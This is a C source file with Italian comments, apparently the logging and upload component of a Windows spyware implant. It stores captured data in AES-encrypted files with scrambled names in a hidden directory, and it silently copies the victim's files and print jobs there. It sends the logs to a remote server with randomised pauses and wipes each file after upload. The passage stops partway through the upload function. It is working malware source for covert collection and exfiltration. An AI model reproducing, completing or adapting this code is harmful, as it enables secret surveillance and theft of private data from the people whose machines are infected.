#include <windows.h>
#include <time.h>
#include <stdio.h>
#include "common.h"
#include "ASP.h"
#include "LOG.h"
#include "H4-DLL.h"
#include "aes_alg.h"

typedef struct {
	DWORD agent_tag;
	HANDLE h_file;
} log_entry_struct;

typedef struct log_list {
	nanosec_time ftime;
	char *file_name;
	struct log_list* next;
} log_list_struct;

log_list_struct *log_list_head = NULL;


#define NO_TAG_ENTRY 0xFFFFFFFF
#define MAX_LOG_ENTRIES 70
#define MIN_CREATION_SPACE 307200 // Numero di byte che devono essere rimasti per creare ancora nuovi file di log
log_entry_struct log_table[MAX_LOG_ENTRIES];

// Dichiarato in SM_EventHandlers.h
extern BOOL IsGreaterDate(nanosec_time *, nanosec_time *);

extern aes_context crypt_ctx; // Dichiarata in shared
extern BYTE crypt_key[KEY_LEN]; // Dichiarata in shared
BOOL log_wipe_file = FALSE; // Indica se sovrascrive un file prima di cancellarlo
DWORD min_disk_free = 0;    // Spazio minimo che deve rimanere su disco (configurabile)
DWORD max_disk_full = 0;    // Spazio massimo occupabile dai log
extern DWORD log_free_space; // Dichiarata nel segmento shared
extern DWORD log_active_queue;


// Inserisce un elemento nella lista dei log da spedire in ordine di tempo
BOOL InsertLogList(log_list_struct **log_list, WIN32_FIND_DATA *log_elem)
{
	log_list_struct *new_elem;

	// Alloca e inizializza il nuovo elemento
	if ( !(new_elem = (log_list_struct *)malloc(sizeof(log_list_struct))) )
		return FALSE;
	if ( !(new_elem->file_name = (char *)strdup(log_elem->cFileName)) ) {
		SAFE_FREE(new_elem);
		return FALSE;
	}
	new_elem->ftime.hi_delay = log_elem->ftCreationTime.dwHighDateTime;
	new_elem->ftime.lo_delay = log_elem->ftCreationTime.dwLowDateTime;

	// Cerca l'elemento dove va inserito
	while (*log_list) {
		// Se abbiamo trovato il posto giusto si ferma
		if (!IsGreaterDate(&(new_elem->ftime), &((*log_list)->ftime)))
			break;
		// Continua a scorrere la lista
		log_list = &( (*log_list)->next );
	}

	new_elem->next = *log_list;
	*log_list = new_elem;
	
	return TRUE;
}

// Libera la lista dei log
void FreeLogList(log_list_struct **log_list)
{
	log_list_struct *list_ptr, *tmp_ptr;
	list_ptr = *log_list;
	while(list_ptr) {
		SAFE_FREE(list_ptr->file_name);
		tmp_ptr = list_ptr->next;
		SAFE_FREE(list_ptr);
		list_ptr = tmp_ptr;
	}
	*log_list = NULL;
}

// Fa una pausa random in un intervallo (in secondi)
void LOG_SendPause(DWORD min_sleep, DWORD max_sleep)
{
	DWORD sleep_time;
	if (min_sleep > max_sleep || max_sleep == 0)
		return;

	srand((DWORD)time(NULL));
	rand();
	sleep_time = (((double)rand()/(double)RAND_MAX) * (max_sleep-min_sleep) + min_sleep);
	sleep_time*=1000;
	Sleep(sleep_time);
}

// Inizializza la chiave di cifratura.
void LOG_InitCryptKey(BYTE *crypt_material)
{
	memcpy(crypt_key, crypt_material, KEY_LEN);
	aes_set_key( &crypt_ctx, crypt_material, KEY_LEN*8 );
}

// Legge la configuazione per i log
// (viene letto solo quando inizializza i log e
// non sulla ricezione di un nuovo file)
void UpdateLogConf()
{
	BYTE *conf_memory;

	conf_memory = HM_ReadClearConf(H4_CONF_FILE);

	// Effettua il parsing del file di configurazione mappato
	// XXX Non c'e' il controllo che conf_ptr possa uscire fuori dalle dimensioni del file mappato
	// (viene assunto che la configurazione sia coerente e il file integro)
	if (conf_memory) {
		BYTE *conf_ptr;

		// conf_ptr si sposta nel file durante la lettura
		conf_ptr = (BYTE *)HM_memstr((char *)conf_memory, LOGRP_CONF_DELIMITER);
		// Legge lo spazio disco minimo
		READ_DWORD(min_disk_free, conf_ptr);
		// Legge lo spazio massimo occupabile
		READ_DWORD(max_disk_full, conf_ptr);
		// Legge se fare il wiping
		READ_DWORD(log_wipe_file, conf_ptr);

		SAFE_FREE(conf_memory);
	}
}


// Sottrae due large integer (con a>b)
void LargeSubtract(const ULARGE_INTEGER *a,
				   const ULARGE_INTEGER *b,
				   ULARGE_INTEGER *result)
{
	if (a->LowPart >= b->LowPart) {
		result->LowPart = a->LowPart - b->LowPart;
		result->HighPart = a->HighPart - b->HighPart;
	} else {
		result->LowPart = (0xffffffff - b->LowPart);
		result->LowPart += 1 + a->LowPart;
		result->HighPart = a->HighPart - b->HighPart - 1;
	}
}


// Torna lo spazio destinato ai log.
// Il minimo spazio libero richiedibile e' massimo 4GB.
// Lo spazio occupabile dai log e' massimo 4GB.
DWORD LOG_CalcSpace(ULARGE_INTEGER *large_space, DWORD space_req)
{
	ULARGE_INTEGER large_req;
	ULARGE_INTEGER result;

	// Se lo spazio richiesto e' maggiore, ritorna 0
	if (large_space->HighPart == 0 && large_space->LowPart <= space_req)
		return 0;

	// Se lo spazio richiesto e' minore, sottrae
	large_req.HighPart = 0;
	large_req.LowPart = space_req;
	LargeSubtract(large_space, &large_req, &result);

	// Se il risultato e' > di 4GB, ritorna 4GB
	if (result.HighPart>0)
		return 0xFFFFFFFF;

	// Altrimenti torna la parte bassa
	return result.LowPart;
}

// Calcola la dimensione della directory di lavoro
// Se fallisce torna che la directory occupa 4GB
DWORD LOG_GetActualLogSize()
{
	DWORD log_total_size = 0xFFFFFFFF;
	char DirSpec[MAX_PATH];  
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind = INVALID_HANDLE_VALUE;

	HM_CompletePath("*", DirSpec);
	hFind = FindFirstFile(DirSpec, &FindFileData);
	if (hFind != INVALID_HANDLE_VALUE) {
		log_total_size = 0;
		do {
			// Salta le directory (es: ".", ".." etc...)
			if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
				continue;
			
			if (FindFileData.nFileSizeLow != INVALID_FILE_SIZE)
				log_total_size += FindFileData.nFileSizeLow;
		} while (FindNextFile(hFind, &FindFileData) != 0);
		FindClose(hFind);
	}
	return log_total_size;
}

// Inizializza l'utilizzo dei log
void LOG_InitLog()
{
	DWORD i;
	ULARGE_INTEGER temp_free_space;
	char disk_path[DLLNAMELEN];
	DWORD temp_log_space;
	DWORD allowed_size1 = 0;
	DWORD allowed_size2 = 0;

	// All'inizio parte dalla coda 0 
	// XXX dovrebbe partire dalla coda dove c'e' il file piu' recente...
	// eviterebbe il possibile invio non in ordine dei file di skype (che puo'
	// avvenire in condizioni molto particolari).
	// Bisogna fare attenzione perche' questo e' fatto prima di mettere la chiave nel
	// registry, quindi un'operazione del genere potrebbe forse rallentare in caso di
	// tantissimi files.
	log_active_queue = 0;

	// Legge la configurazione dei log
	UpdateLogConf();

	// Inizializza la tabella dei log
	for (i=0; i<MAX_LOG_ENTRIES; i++) {
		log_table[i].agent_tag = NO_TAG_ENTRY;
		log_table[i].h_file = INVALID_HANDLE_VALUE;
	}

	// Inizializza lo spazio rimanente sul disco
	// dove e' la directory di lavoro
	// (min disk free)
	if (GetDiskFreeSpaceEx(HM_CompletePath("", disk_path), NULL, NULL, &temp_free_space))
		allowed_size1 = LOG_CalcSpace(&temp_free_space, min_disk_free);	

	// Inizializza lo spazio ancora a disposizione per i log
	// (max disk full)
	temp_log_space = LOG_GetActualLogSize();
	if (max_disk_full >= temp_log_space)
		allowed_size2 = max_disk_full - temp_log_space;

	// Lo spazio libero e' la condizione piu' stringente
	// fra le due sopra
	// (se qualcosa va storto log_free_space = 0)
	if (allowed_size1 < allowed_size2)
		log_free_space = allowed_size1;
	else
		log_free_space = allowed_size2;
}


// Inizializza l'uso dei log per un agente
// (non e' thread safe)
// Torna TRUE se ha successo
BOOL LOG_InitAgentLog(DWORD agent_tag)
{
	DWORD i;
	HANDLE h_file;
	char log_wout_path[128];
	char file_name[DLLNAMELEN];
	char *scrambled_name;

	// Controlla che il TAG non sia gia' presente
	for (i=0; i<MAX_LOG_ENTRIES; i++) 
		if (log_table[i].agent_tag == agent_tag)
			return TRUE;

	// Cerca una entry vuota e la riempie (solo se 
	// riesce ad aprire il file)
	for(i=0; i<MAX_LOG_ENTRIES; i++) 
		if (log_table[i].agent_tag == NO_TAG_ENTRY) {
			sprintf(log_wout_path, "%.1XLOG_%.4X.bin", log_active_queue, agent_tag);
			if ( ! (scrambled_name = LOG_ScrambleName(log_wout_path, crypt_key[0], TRUE)) )
				return FALSE;			
			HM_CompletePath(scrambled_name, file_name);
			SAFE_FREE(scrambled_name);

			h_file = CreateFile(file_name, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, OPEN_ALWAYS, 0, NULL);
			if (h_file == INVALID_HANDLE_VALUE) 
				return FALSE;
			SetFilePointer(h_file, 0, NULL, FILE_END);

			log_table[i].h_file = h_file;
			log_table[i].agent_tag = agent_tag;
			return TRUE;
		}

	return FALSE;
}


// Stoppa l'uso dei log per un agente
void LOG_StopAgentLog(DWORD agent_tag)
{
	DWORD i;

	// Cerca il TAG giusto
	for (i=0; i<MAX_LOG_ENTRIES; i++) 
		if (log_table[i].agent_tag == agent_tag) {
			log_table[i].agent_tag = NO_TAG_ENTRY;
			CloseHandle(log_table[i].h_file);
			log_table[i].h_file = INVALID_HANDLE_VALUE;
			return;
		}
}


// Offusca un log. Ritorna il buffer cifrato (che andra' liberato)
BYTE *LOG_Obfuscate(BYTE *buff, DWORD buff_len, DWORD *crypt_len)
{
	DWORD *ptr;       // Indice nel buffer cifrato
	BYTE *crypt_buff;
	DWORD tot_len;
	DWORD i;
	BYTE iv[BLOCK_LEN];

	// Il buffer sara' composto cosi':
	// DWORD original_len
	// buffer
	// padding (in modo che tutto sia multiplo di 16 byte)
	tot_len = buff_len + sizeof(DWORD);
	if (tot_len % BLOCK_LEN) {
		tot_len /= BLOCK_LEN;
		tot_len++;
		tot_len *= BLOCK_LEN;
	}

	// Check overflow
	if (tot_len < buff_len)
		return NULL;

	// Alloca il buffer
	crypt_buff = (BYTE *)calloc(tot_len, 1);
	if (!crypt_buff)
		return NULL;

	*crypt_len = tot_len;

	// Copia la lunghezza originale 
	ptr = (DWORD *)crypt_buff;
	*ptr = buff_len;
	ptr++;

	// Copia il buffer in chiaro (rimarranno dei byte di padding
	// inutilizzati).
	memcpy(ptr, buff, buff_len);
	memset(iv, 0, sizeof(iv));

	// Cifra tutto il blocco
	aes_cbc_encrypt(&crypt_ctx, iv, crypt_buff, crypt_buff, tot_len);

	return crypt_buff;
}


// Scrive un a entry nel file di log corrispondente
BOOL LOG_ReportLog(DWORD agent_tag, BYTE *buff, DWORD buff_len)
{
	DWORD i;
	
	// Cerca il TAG giusto
	for (i=0; i<MAX_LOG_ENTRIES; i++) 
		if (log_table[i].agent_tag == agent_tag) 
			return Log_WriteFile(log_table[i].h_file, buff, buff_len);

	return FALSE;
}


// Effettua lo scrambling e il descrimbling di una stringa
// Ricordarsi di liberare la memoria allocata
// E' Thread SAFE
char *LOG_ScrambleName(char *string, BYTE scramble, BOOL crypt)
{
	char alphabet[ALPHABET_LEN]={'_','B','q','w','H','a','F','8','T','k','K','D','M',
		                         'f','O','z','Q','A','S','x','4','V','u','X','d','Z',
		                         'i','b','U','I','e','y','l','J','W','h','j','0','m',
                                 '5','o','2','E','r','L','t','6','v','G','R','N','9',
					             's','Y','1','n','3','P','p','c','7','g','-','C'};                  
	char *ret_string;
	DWORD i,j;

	if ( !(ret_string = _strdup(string)) )
		return NULL;

	// Evita di lasciare i nomi originali anche se il byte e' 0
	scramble%=ALPHABET_LEN;
	if (scramble == 0)
		scramble = 1;

	for (i=0; ret_string[i]; i++) {
		for (j=0; j<ALPHABET_LEN; j++)
			if (ret_string[i] == alphabet[j]) {
				// Se crypt e' TRUE cifra, altrimenti decifra
				if (crypt)
					ret_string[i] = alphabet[(j+scramble)%ALPHABET_LEN];
				else
					ret_string[i] = alphabet[(j+ALPHABET_LEN-scramble)%ALPHABET_LEN];
				break;
			}
	}
	return ret_string;
}

// --- Funzioni per far creare file agli agenti ---
// DEVONO ESSERE TUTTE THREAD SAFE

// Crea un file di log
HANDLE Log_CreateFile(DWORD agent_tag, char *file_tag)
{
	char log_wout_path[128];
	char file_name[DLLNAMELEN];
	char *scrambled_name;
	FILETIME time_nanosec;
	SYSTEMTIME system_time;

	// Controlla che ci sia ancora spazio per scrivere su disco
	if (log_free_space <= MIN_CREATION_SPACE) 
		return INVALID_HANDLE_VALUE;

	// Usa l'epoch per dare un nome univoco al file
	GetSystemTime(&system_time);
	SystemTimeToFileTime(&system_time, &time_nanosec);
	
	_snprintf_s(log_wout_path, sizeof(log_wout_path), _TRUNCATE, "%.1XLOGF_%.4X_%s_%.8X%.8X.bin", log_active_queue, agent_tag, file_tag, time_nanosec.dwHighDateTime, time_nanosec.dwLowDateTime);
	if ( ! (scrambled_name = LOG_ScrambleName(log_wout_path, crypt_key[0], TRUE)) )
		return INVALID_HANDLE_VALUE;	
	HM_CompletePath(scrambled_name, file_name);
	SAFE_FREE(scrambled_name);

	return CreateFile(file_name, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 
}

// Chiude un file di log
void Log_CloseFile(HANDLE handle)
{
	if (handle != INVALID_HANDLE_VALUE)
		CloseHandle(handle);
}


// Cancella tutti i file di log
void Log_RemoveFiles()
{
	char log_file[DLLNAMELEN];
	WIN32_FIND_DATA FindFileData;
	char DirSpec[MAX_PATH];  
	HANDLE hFind = INVALID_HANDLE_VALUE;

	// Cerca tutti i file nella directory di lavoro tranne
	// il core e il file di configurazione
	HM_CompletePath("*", DirSpec);
	hFind = FindFirstFile(DirSpec, &FindFileData);
	if (hFind != INVALID_HANDLE_VALUE) {
		do {
			// Salta le directory (es: ".", ".." etc...)
			if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
				continue;

			// Cancella i file che non sono il core o il file di conf
			if (stricmp(FindFileData.cFileName, H4DLLNAME) && stricmp(FindFileData.cFileName, H4_CONF_FILE))
				HM_WipeFile(HM_CompletePath(FindFileData.cFileName, log_file));
		} while (FindNextFile(hFind, &FindFileData) != 0);
		FindClose(hFind);
	}
}


// Salva lo stato di un agente
BOOL Log_SaveAgentState(DWORD agent_tag, BYTE *conf_buf, DWORD conf_len)
{
	char conf_name[128];
	char conf_path[DLLNAMELEN];
	char *scrambled_name;
	HANDLE hf;
	DWORD dwWrt = 0;

	// Il formato del nome e' AGCNF_<agent>.bin
	_snprintf_s(conf_name, sizeof(conf_name), _TRUNCATE, "AGCNF_%.4X.bin", agent_tag);
	if ( ! (scrambled_name = LOG_ScrambleName(conf_name, crypt_key[0], TRUE)) ) 
		return FALSE;
	
	HM_CompletePath(scrambled_name, conf_path);
	SAFE_FREE(scrambled_name);

	hf = CreateFile(conf_path, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 
	if (hf == INVALID_HANDLE_VALUE)
		return FALSE;

	// Verifica che abbia scritto tutto
	if (!WriteFile(hf, conf_buf, conf_len, &dwWrt,  NULL) || dwWrt!=conf_len) {
		CloseHandle(hf);
		return FALSE;
	}

	CloseHandle(hf);
	return TRUE;
}

// Carica lo stato di un agente
BOOL Log_RestoreAgentState(DWORD agent_tag, BYTE *conf_buf, DWORD conf_len)
{
	char conf_name[128];
	char conf_path[DLLNAMELEN];
	char *scrambled_name;
	HANDLE hf;
	DWORD dwRd = 0;

	// Il formato del nome e' AGCNF_<agent>.bin
	_snprintf_s(conf_name, sizeof(conf_name), _TRUNCATE, "AGCNF_%.4X.bin", agent_tag);
	if ( ! (scrambled_name = LOG_ScrambleName(conf_name, crypt_key[0], TRUE)) ) 
		return FALSE;
	
	HM_CompletePath(scrambled_name, conf_path);
	SAFE_FREE(scrambled_name);

	hf = CreateFile(conf_path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 
	if (hf == INVALID_HANDLE_VALUE)
		return FALSE;

	// Verifica che abbia scritto tutto
	if (!ReadFile(hf, conf_buf, conf_len, &dwRd,  NULL) || dwRd!=conf_len) {
		CloseHandle(hf);
		return FALSE;
	}

	CloseHandle(hf);
	return TRUE;
}

// Copia il file in modo offuscato (aggiornando la quota
// disco anche in caso di sovrascritture).
#define CRYPT_COPY_BUF_LEN 102400
BOOL Log_CryptCopyFile(char *src_path, char *dest_file_path)
{
	HANDLE hsrc, hdst;
	BY_HANDLE_FILE_INFORMATION dst_info;
	DWORD existent_file_size = 0;
	DWORD dwRead;
	BYTE *temp_buff;

	// Prende le info del file destinazione (se esiste)
	hdst = CreateFile(dest_file_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
	if (hdst != INVALID_HANDLE_VALUE) {
		if (GetFileInformationByHandle(hdst, &dst_info)) {
			existent_file_size = dst_info.nFileSizeLow;
		}
		CloseHandle(hdst);
	}

	if ( !(temp_buff = (BYTE *)malloc(CRYPT_COPY_BUF_LEN)) )
		return FALSE;

	hsrc = CreateFile(src_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
	if (hsrc == INVALID_HANDLE_VALUE) {
		SAFE_FREE(temp_buff);
		return FALSE;
	}

	// Controlla che ci sia ancora spazio per scrivere su disco
	if ((log_free_space + existent_file_size)<= MIN_CREATION_SPACE) {
		SAFE_FREE(temp_buff);
		CloseHandle(hsrc);
		return FALSE;
	}

	hdst = CreateFile(dest_file_path, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL);
	if (hdst == INVALID_HANDLE_VALUE) {
		SAFE_FREE(temp_buff);
		CloseHandle(hsrc);
		return FALSE;
	}
	// Se il file e' stato sovrascritto (e con successo) restituisce la quota disco
	// recuperata.
	log_free_space += existent_file_size;

	// Cicla finche riesce a leggere (e/o a scrivere)
	LOOP {
		dwRead = 0;
		if (!ReadFile(hsrc, temp_buff, CRYPT_COPY_BUF_LEN, &dwRead, NULL) )
			break;
		// La Log_WriteFile sottrae la quota disco di ogni scrittura
		// XXX Esce perche' quando il file da leggere e' finito dwRead e' 0
		// e Log_WriteFile ritorna FALSE se gli fai scrivere 0 byte
		if (!Log_WriteFile(hdst, temp_buff, dwRead))
			break;
	}

	SAFE_FREE(temp_buff);
	CloseHandle(hsrc);
	CloseHandle(hdst);
	return TRUE;
}

// Copia il file nella directory nascosta. Fa un hash del path.
// File con path uguale vengono sovrascritti. Effettua la copia solo
// se la destinazione non ha la stessa data della sorgente.
BOOL Log_CopyFile(char *src_path, DWORD agent_tag)
{
	HANDLE hfile;
	BY_HANDLE_FILE_INFORMATION src_info, dst_info;
	char red_fname[100];
	char log_wout_path[_MAX_FNAME];
	char dest_file_path[DLLNAMELEN];
	char *scrambled_name;
	char *file_name;
	char *ptr;
	nanosec_time src_date, dst_date;
	DWORD path_hash;
	long long temp_hash;
	
	// Prende le informazioni del file sorgente
	hfile = CreateFile(src_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
	if (hfile == INVALID_HANDLE_VALUE)
		return FALSE;
	if (!GetFileInformationByHandle(hfile, &src_info)) {
		CloseHandle(hfile);
		return FALSE;
	}
	CloseHandle(hfile);

	// Check se e' una directory
	if (src_info.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
		return FALSE;

	// Vede se la dimensione e' consistente
	if (src_info.nFileSizeHigh>0 || src_info.nFileSizeLow==0) 
		return FALSE;
	
	// Prende il nome del file
	file_name = strrchr(src_path, '\\');
	if (file_name)
		file_name++;
	else 
		file_name = src_path;

	// Crea l'hash del path
	temp_hash = 0;
	ptr = src_path;
	while (*ptr) {
		temp_hash++;
		temp_hash *= (*ptr);
		path_hash = (DWORD)(temp_hash >> 32);
		temp_hash &= 0xFFFFFFFF;
		temp_hash ^= path_hash;
		ptr++;
	}
	path_hash = (DWORD)temp_hash;

	// Il formato del nome e' [0/1]LOGF_<agent>_<file_name>_<path_hash>.bin
	_snprintf_s(red_fname, sizeof(red_fname), _TRUNCATE, "%s", file_name);
	_snprintf_s(log_wout_path, sizeof(log_wout_path), _TRUNCATE, "%.1XLOGF_%.4X_%s_%.8X.bin", log_active_queue, agent_tag, red_fname, path_hash);
	if ( ! (scrambled_name = LOG_ScrambleName(log_wout_path, crypt_key[0], TRUE)) ) 
		return FALSE;
	
	HM_CompletePath(scrambled_name, dest_file_path);
	SAFE_FREE(scrambled_name);

	// Prende le info del file destinazione (se esiste)
	hfile = CreateFile(dest_file_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
	if (hfile != INVALID_HANDLE_VALUE) {
		if (!GetFileInformationByHandle(hfile, &dst_info)) {
			CloseHandle(hfile);
			return FALSE;
		}
		CloseHandle(hfile);

		// Compara le date dei due file (evita riscritture dello stesso file)
		src_date.hi_delay = src_info.ftLastWriteTime.dwHighDateTime;
		src_date.lo_delay = src_info.ftLastWriteTime.dwLowDateTime;
		dst_date.hi_delay = dst_info.ftLastWriteTime.dwHighDateTime;
		dst_date.lo_delay = dst_info.ftLastWriteTime.dwLowDateTime;
		if (!IsGreaterDate(&src_date, &dst_date)) 
			return FALSE;
	}

	// Effettua la vera copia.
	if (!Log_CryptCopyFile(src_path, dest_file_path)) 
		return FALSE;

	return TRUE;
}

// Scrive in un file di log.
// Controlla la quota disco
// Torna TRUE se ha successo
BOOL Log_WriteFile(HANDLE handle, BYTE *clear_buffer, DWORD clear_len)
{
	DWORD dwTmp;
	BOOL ret_val;
	DWORD crypt_len = 0;
	BYTE *crypt_buffer = NULL;

	// Controlla che la richiesta sia valida
	if (handle == INVALID_HANDLE_VALUE || clear_len == 0 || clear_buffer == NULL)
		return FALSE;

	// Offusca il buffer. La funzione torna una copia del buffer
	// gia' offuscata, e la dimensione di essa. La copia va
	// liberata (se e' stata allocata).
	crypt_buffer = LOG_Obfuscate(clear_buffer, clear_len, &crypt_len);

	// Controlla lo spazio disco rimasto e che la cifratura
	// sia andata a buon fine
	if (!crypt_buffer || crypt_len > log_free_space) {
		SAFE_FREE(crypt_buffer);
		return FALSE;
	}

	ret_val = WriteFile(handle, crypt_buffer, crypt_len, &dwTmp,  NULL);
	SAFE_FREE(crypt_buffer);

	// Se ha scritto con successo, diminuisce lo spazio residuo
	// XXX Potrebbe esserci una race condition e log_free_space 
	// diventerebbe enorme...(abbastanza remoto)
	// Col doppio check diminuisco le possiblita' di race 
	// condition ulteriormente.
	if (ret_val && crypt_len<=log_free_space)
		log_free_space -= crypt_len;

	return ret_val;
}

// Elimina da una stringa tutti i caratteri non 
// alfanumerici
void Log_Sanitize(char *name)
{
	unsigned char *ptr;
	for(ptr=(unsigned char *)name; *ptr!=0; ptr++)
		if (*ptr != ' ' && *ptr != '-' && *ptr != '.') 
			if (*ptr<'0' || (*ptr>'9' && *ptr<'A') || (*ptr>'Z' && *ptr<'a') || *ptr>'z')
				*ptr = '_';
}


// Scambia la coda di log attiva con quella inattiva
void Log_SwitchQueue()
{
	log_active_queue = !log_active_queue;
}

// Funzione esportata per permettere di loggare una bitmap 
#include "HM_BitmapCommon.h"
void __stdcall Log_PrintDC(char *doc_name, HDC print_dc, HBITMAP print_bmp, DWORD x_dim, DWORD y_dim)
{
	BITMAPINFOFULL bmhFull;
	BITMAPFILEHEADER bmhdr;
	DWORD *pdwFullBits = NULL;
	LOGPALETTEFULL m8pal;
	HPALETTE hPalette = 0;
	HANDLE hf;
	HDC safe_dc, g_hScrDC;
	HBITMAP safe_bmp;

	// Crea un DC e una bitmap compatibili con lo schermo per
	// avere una palette coerente
	if ( !(g_hScrDC = CreateDC("DISPLAY", NULL, NULL, NULL)) )
		return;
	safe_dc = CreateCompatibleDC(NULL);
	safe_bmp = CreateCompatibleBitmap(g_hScrDC, x_dim, y_dim);
	DeleteDC(g_hScrDC);
	SelectObject(safe_dc, safe_bmp);
	// Copia il print_memory_dc nel dc compatibile con lo schermo
	// per l'acquisizione in bitmap
	BitBlt(safe_dc, 0, 0, x_dim, y_dim, print_dc, 0, 0, SRCCOPY);

	// Alloca la bitmap di dimensione sicuramente superiore a quanto sara' 
	if ( !(pdwFullBits = (DWORD *)malloc(x_dim * y_dim * sizeof(DWORD))) )
		return;

	// Settaggi per il capture dello screen
	ZeroMemory(&bmhFull, sizeof(BITMAPINFOHEADER));
	bmhFull.bmiHeader.biSize = sizeof(BITMAPINFOHEADER);
	bmhFull.bmiHeader.biWidth = x_dim;
	bmhFull.bmiHeader.biHeight = y_dim;
	bmhFull.bmiHeader.biPlanes = 1;
	bmhFull.bmiHeader.biBitCount = 8;
	bmhFull.bmiHeader.biCompression = BI_RLE8;
	bmhFull.bmiHeader.biSizeImage = x_dim * y_dim * sizeof(DWORD);

	// Setta la palette da usare
	m8pal.palVersion = 0x300;
    m8pal.palNumEntries = 256;
	BUILD_PALETTE(m8pal.palPalEntry);
	hPalette = CreatePalette((LOGPALETTE *)&m8pal);
	SelectPalette(safe_dc, hPalette, TRUE);

	// Prende il contenuto del DC
	if (GetDIBits(safe_dc, safe_bmp, 0, y_dim, pdwFullBits, (BITMAPINFO *)&bmhFull, DIB_PAL_COLORS)) {
		BUILD_PALETTE(bmhFull.bmiColors);

		// Header file bitmap
		bmhFull.bmiHeader.biClrUsed = 256;
		bmhFull.bmiHeader.biClrImportant = 256;
		bmhdr.bfType = 0x4d42;
		bmhdr.bfOffBits = sizeof(BITMAPFILEHEADER) + bmhFull.bmiHeader.biSize + 256 * sizeof (RGBQUAD); 
		bmhdr.bfSize = bmhdr.bfOffBits + bmhFull.bmiHeader.biSizeImage;
		bmhdr.bfReserved1 = 0; 
		bmhdr.bfReserved2 = 0; 
	
		//Output su file
		Log_Sanitize(doc_name);
		hf = Log_CreateFile(PM_PRINTAGENT, doc_name);
		Log_WriteFile(hf, (BYTE *)&bmhdr, sizeof(BITMAPFILEHEADER));
		Log_WriteFile(hf, (BYTE *)&bmhFull.bmiHeader, sizeof(BITMAPINFOHEADER)); 
		Log_WriteFile(hf, (BYTE *)bmhFull.bmiColors, bmhFull.bmiHeader.biClrUsed * sizeof (RGBQUAD)); 
		Log_WriteFile(hf, (BYTE *)pdwFullBits, bmhFull.bmiHeader.biSizeImage);
		Log_CloseFile(hf); 
	}

	// Rilascio oggetti....
	if (safe_bmp) DeleteObject(safe_bmp);
	if (safe_dc) DeleteDC(safe_dc);
	if (hPalette) DeleteObject(hPalette);
	SAFE_FREE(pdwFullBits);
}


//------------------- FUNZIONI PER LA SPEDIZIONE DEI LOG ---------------

#define B100Mbit 1024*1024/8 // band limit generico (abbastanza grande)
#define ERROR_RETURN_1 FreeLogList(&log_list_head); return FALSE;
#define ERROR_RETURN_2 if (hFind != INVALID_HANDLE_VALUE) FindClose(hFind); return FALSE;
#define SEND_LOGFILE_AND_DELETE(x,z,y) { \
										DWORD file_size; \
										DWORD name_len; \
										HANDLE hfile=INVALID_HANDLE_VALUE; \
										name_len=strlen(z); \
										if ( (hfile = CreateFile(x, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) ==  INVALID_HANDLE_VALUE ) \
                                        {	file_size = 0; } \
										else { file_size = GetFileSize(hfile, NULL); \
										if (file_size == INVALID_FILE_SIZE) file_size = 0; \
										if (hfile!=INVALID_HANDLE_VALUE) CloseHandle(hfile); }\
										if (!ASP_Write(NULL, (BYTE *)&file_size, 4, TRUE, y) || \
										    !ASP_Write(NULL, (BYTE *)z, name_len, TRUE, y) || \
                                            (file_size && !ASP_Write(x, NULL, 0, TRUE, y))) \
                                        {	ERROR_RETURN_1; } \
										else { \
											HM_WipeFile(x); \
											log_free_space += file_size; }}


#define SEND_LOGFILE(x,y) { \
							DWORD file_size; \
							DWORD name_len; \
							HANDLE hfile=INVALID_HANDLE_VALUE; \
							name_len=strlen(x); \
							if ( (hfile = CreateFile(x, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL)) ==  INVALID_HANDLE_VALUE ) \
                            {	file_size = 0; } \
							else { file_size = GetFileSize(hfile, NULL); \
							if (file_size == INVALID_FILE_SIZE) file_size = 0; \
							if (hfile!=INVALID_HANDLE_VALUE) CloseHandle(hfile); }\
							if (!ASP_Write(NULL, (BYTE *)&file_size, 4, TRUE, y) || \
							    !ASP_Write(NULL, (BYTE *)x, name_len, TRUE, y) || \
                                (file_size && !ASP_Write(x, NULL, 0, TRUE, y))) \
							{	ERROR_RETURN_2; }}
							

#define SEND_TERMINATION(y)  {  DWORD file_size = 0; \
	                            DWORD name = 0x0A0A0A0A;\
						        if (!ASP_Write(NULL, (BYTE *)&file_size, 4, TRUE, y) || \
						 	        !ASP_Write(NULL, (BYTE *)&name, 4, TRUE, y)) \
							    {   return FALSE; }}


// Invia la coda dei log al server
// Manda sempre tutti i file. Se la dimensione del file inviata e' 0
// il file non viene mandato e il server non si deve aspettare nulla (passa al successivo)
// Il band limit e' in byte al secondo
BOOL LOG_SendLogQueue(DWORD band_limit, DWORD min_sleep, DWORD max_sleep)
{
	char log_file_path[DLLNAMELEN];
	char log_file[DLLNAMELEN];
	WIN32_FIND_DATA FindFileData;
	char DirSpec[DLLNAMELEN];  
	char *scrambled_search;
	char search_mask[64];
	char *clear_name;
	log_list_struct *log_list;
	HANDLE hFind = INVALID_HANDLE_VALUE;

	// Cerca tutti i file di tipo "1/0LOG*.bin", sia LOG_, sia LOGF_
	sprintf(search_mask, "%.1XLOG*.bin", !log_active_queue);
	scrambled_search = LOG_ScrambleName(search_mask, crypt_key[0], TRUE);
	if (!scrambled_search)
		return FALSE;
